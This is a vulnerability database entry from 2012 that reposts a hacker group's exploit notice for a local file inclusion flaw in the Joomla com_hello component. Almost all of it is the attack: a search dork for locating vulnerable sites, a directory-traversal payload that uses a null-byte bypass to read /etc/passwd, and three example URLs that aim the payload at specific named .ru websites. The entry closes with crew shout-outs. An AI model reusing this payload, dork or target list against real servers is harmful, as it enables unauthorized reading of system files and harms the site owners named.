Joomla Hello component suffers from a local file inclusion vulnerability.

2012-07-22T00:00:00
ID SSV:60289
Type seebug
Reporter Root
Modified 2012-07-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##################################################################################
#   Title : Joomla Component com_hello Local File Include
#
#   Author : Ajax Security Team
#
#   Discovered By : devilzc0der & Dominator
#
#   Dork : inurl:"com_hello"
#
#   h0m3 : www.ajaxtm.com
#
#   Software Link : www.joomla.com
#
#   Level : High
##################################################################################
#  p0c :
#                com_hello&controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypas .
##################################################################################
# 3xample :
#
#
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
#
http://etm-proekt.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
#
http://a2-svz.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
###################################################################################
# Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion
- Daniyal
###################################################################################
# GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD & All
Iranian HackerZ
###################################################################################